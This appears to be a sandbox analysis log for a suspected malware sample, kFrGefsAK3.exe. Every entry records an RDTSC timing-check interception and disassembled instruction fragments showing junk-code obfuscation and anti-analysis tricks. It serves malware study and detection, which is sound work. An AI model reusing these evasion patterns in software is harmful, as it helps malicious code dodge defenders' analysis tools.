Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B73F1 second address: 13B73F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B66DE second address: 13B66E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B73F5 second address: 13B7406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007FA278C27B76h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B7406 second address: 13B7442 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 mov edi, eax 0x0000000a push 00000000h 0x0000000c mov edi, dword ptr [ebp+122D3449h] 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007FA278C0D018h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e xchg eax, esi 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 push esi 0x00000033 pop esi 0x00000034 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B7657 second address: 13B765B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B8559 second address: 13B8562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B8562 second address: 13B8566 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B969E second address: 13B96AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13BA496 second address: 13BA4B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA278C27B7Dh 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007FA278C27B76h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13BA4B4 second address: 13BA4BE instructions: 0x00000000 rdtsc 0x00000002 je 00007FA278C0D016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B96AD second address: 13B974C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jc 00007FA278C27B76h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d cld 0x0000000e mov dword ptr [ebp+12449F36h], ecx 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007FA278C27B78h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 00000016h 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 stc 0x00000036 mov dword ptr [ebp+1244716Ah], edx 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 mov edi, ecx 0x00000045 mov eax, dword ptr [ebp+122D048Dh] 0x0000004b push 00000000h 0x0000004d push ecx 0x0000004e call 00007FA278C27B78h 0x00000053 pop ecx 0x00000054 mov dword ptr [esp+04h], ecx 0x00000058 add dword ptr [esp+04h], 00000015h 0x00000060 inc ecx 0x00000061 push ecx 0x00000062 ret 0x00000063 pop ecx 0x00000064 ret 0x00000065 jmp 00007FA278C27B7Fh 0x0000006a push FFFFFFFFh 0x0000006c call 00007FA278C27B86h 0x00000071 mov bx, 8E92h 0x00000075 pop edi 0x00000076 push eax 0x00000077 pushad 0x00000078 pushad 0x00000079 pushad 0x0000007a popad 0x0000007b push eax 0x0000007c push edx 0x0000007d rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13BC828 second address: 13BC8E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D026h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c or edi, dword ptr [ebp+122D3266h] 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov ebx, dword ptr [ebp+122D26E4h] 0x0000001f jmp 00007FA278C0D021h 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b push 00000000h 0x0000002d push edx 0x0000002e call 00007FA278C0D018h 0x00000033 pop edx 0x00000034 mov dword ptr [esp+04h], edx 0x00000038 add dword ptr [esp+04h], 00000017h 0x00000040 inc edx 0x00000041 push edx 0x00000042 ret 0x00000043 pop edx 0x00000044 ret 0x00000045 mov dword ptr [ebp+122D576Ch], edi 0x0000004b mov eax, dword ptr [ebp+122D0859h] 0x00000051 mov dword ptr [ebp+122D1A80h], edx 0x00000057 push FFFFFFFFh 0x00000059 push 00000000h 0x0000005b push ebx 0x0000005c call 00007FA278C0D018h 0x00000061 pop ebx 0x00000062 mov dword ptr [esp+04h], ebx 0x00000066 add dword ptr [esp+04h], 0000001Dh 0x0000006e inc ebx 0x0000006f push ebx 0x00000070 ret 0x00000071 pop ebx 0x00000072 ret 0x00000073 nop 0x00000074 push eax 0x00000075 push edx 0x00000076 jp 00007FA278C0D02Bh 0x0000007c rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13BC8E6 second address: 13BC8FC instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA278C27B78h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007FA278C27B76h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13C0636 second address: 13C0689 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA278C0D016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D2207h], edx 0x00000014 push 00000000h 0x00000016 mov bx, si 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007FA278C0D018h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 mov dword ptr [ebp+122D29C6h], ebx 0x0000003b xchg eax, esi 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FA278C0D01Ah 0x00000043 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13C0689 second address: 13C068F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13C068F second address: 13C0693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13BE776 second address: 13BE77A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13BD6D3 second address: 13BD6DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13BF6B4 second address: 13BF6B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13C0888 second address: 13C088E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13BD6DB second address: 13BD6DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13BF6B8 second address: 13BF731 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jmp 00007FA278C0D027h 0x0000000d nop 0x0000000e push esi 0x0000000f pop edi 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007FA278C0D018h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 mov edi, edx 0x0000003a mov eax, dword ptr [ebp+122D1385h] 0x00000040 clc 0x00000041 push FFFFFFFFh 0x00000043 jg 00007FA278C0D02Ah 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13BD6DF second address: 13BD6F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 jo 00007FA278C27B7Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13BF731 second address: 13BF735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13C2547 second address: 13C25E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B85h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007FA278C27B78h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 mov bx, 9B14h 0x00000029 jmp 00007FA278C27B87h 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+122D1D38h], edi 0x00000036 pushad 0x00000037 call 00007FA278C27B7Ch 0x0000003c adc ax, AE1Ah 0x00000041 pop eax 0x00000042 jmp 00007FA278C27B7Eh 0x00000047 popad 0x00000048 push 00000000h 0x0000004a mov edi, ebx 0x0000004c xchg eax, esi 0x0000004d push eax 0x0000004e push esi 0x0000004f jmp 00007FA278C27B7Eh 0x00000054 pop esi 0x00000055 pop eax 0x00000056 push eax 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a jno 00007FA278C27B76h 0x00000060 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13BF735 second address: 13BF74D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D024h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13C25E8 second address: 13C25F2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13BF74D second address: 13BF752 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13C25F2 second address: 13C25F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13BF752 second address: 13BF758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13C171C second address: 13C1726 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA278C27B7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13C1726 second address: 13C17A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a call 00007FA278C0D018h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], ecx 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc ecx 0x0000001d push ecx 0x0000001e ret 0x0000001f pop ecx 0x00000020 ret 0x00000021 mov dword ptr [ebp+122D26E9h], ecx 0x00000027 push dword ptr fs:[00000000h] 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007FA278C0D018h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 movzx ebx, cx 0x0000004b mov dword ptr fs:[00000000h], esp 0x00000052 add dword ptr [ebp+122D2D64h], esi 0x00000058 mov eax, dword ptr [ebp+122D0545h] 0x0000005e mov dword ptr [ebp+122D21D0h], ecx 0x00000064 push FFFFFFFFh 0x00000066 push eax 0x00000067 pushad 0x00000068 push eax 0x00000069 push edx 0x0000006a jp 00007FA278C0D016h 0x00000070 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13C17A4 second address: 13C17A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13C3510 second address: 13C3588 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push edx 0x0000000c mov dword ptr [ebp+122D3386h], edi 0x00000012 pop ebx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007FA278C0D018h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f mov bx, 8500h 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007FA278C0D018h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 00000018h 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f xchg eax, esi 0x00000050 pushad 0x00000051 jmp 00007FA278C0D029h 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13C273A second address: 13C2740 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13C281A second address: 13C281F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13C4668 second address: 13C4677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jns 00007FA278C27B84h 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13C3835 second address: 13C383B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13C4677 second address: 13C467B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13C6769 second address: 13C6778 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA278C0D01Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13C6778 second address: 13C67A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA278C27B76h 0x0000000a popad 0x0000000b jo 00007FA278C27B7Ah 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 pushad 0x00000019 push esi 0x0000001a pop esi 0x0000001b jnp 00007FA278C27B76h 0x00000021 push edi 0x00000022 pop edi 0x00000023 popad 0x00000024 jns 00007FA278C27B78h 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13C67A8 second address: 13C67B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA278C0D016h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13C8421 second address: 13C8425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13C8425 second address: 13C8429 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13CF03A second address: 13CF040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13688F8 second address: 13688FD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13CE83F second address: 13CE843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13CEB59 second address: 13CEBA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D025h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pushad 0x0000000d push eax 0x0000000e jmp 00007FA278C0D024h 0x00000013 pop eax 0x00000014 jmp 00007FA278C0D01Fh 0x00000019 push eax 0x0000001a push edx 0x0000001b jns 00007FA278C0D016h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13D6BF4 second address: 13D6BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13D6D7B second address: 13D6D85 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA278C0D016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13DB0DF second address: 13DB0E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13DB279 second address: 13DB296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA278C0D029h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13DB296 second address: 13DB29A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13DB29A second address: 13DB2A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13DB2A0 second address: 13DB2A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13DB53E second address: 13DB54D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA278C0D016h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13DB6A7 second address: 13DB6B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA278C27B76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13DB6B1 second address: 13DB6BD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA278C0D016h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13DB6BD second address: 13DB6D7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA278C27B7Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13DB855 second address: 13DB86B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D01Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13DB86B second address: 13DB8A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA278C27B76h 0x0000000a jmp 00007FA278C27B87h 0x0000000f popad 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 jmp 00007FA278C27B7Eh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13DBA0B second address: 13DBA0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13DBA0F second address: 13DBA2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13DBA2D second address: 13DBA31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13DBA31 second address: 13DBA35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13DBA35 second address: 13DBA3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13E195A second address: 13E1960 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13E1960 second address: 13E1964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13E0C8D second address: 13E0CA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13E0CA0 second address: 13E0CD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D024h 0x00000007 jc 00007FA278C0D01Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA278C0D020h 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13E0CD9 second address: 13E0CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13E0E43 second address: 13E0E47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13E0E47 second address: 13E0E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13E10F9 second address: 13E10FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13E10FF second address: 13E1105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13E126F second address: 13E127D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jng 00007FA278C0D016h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
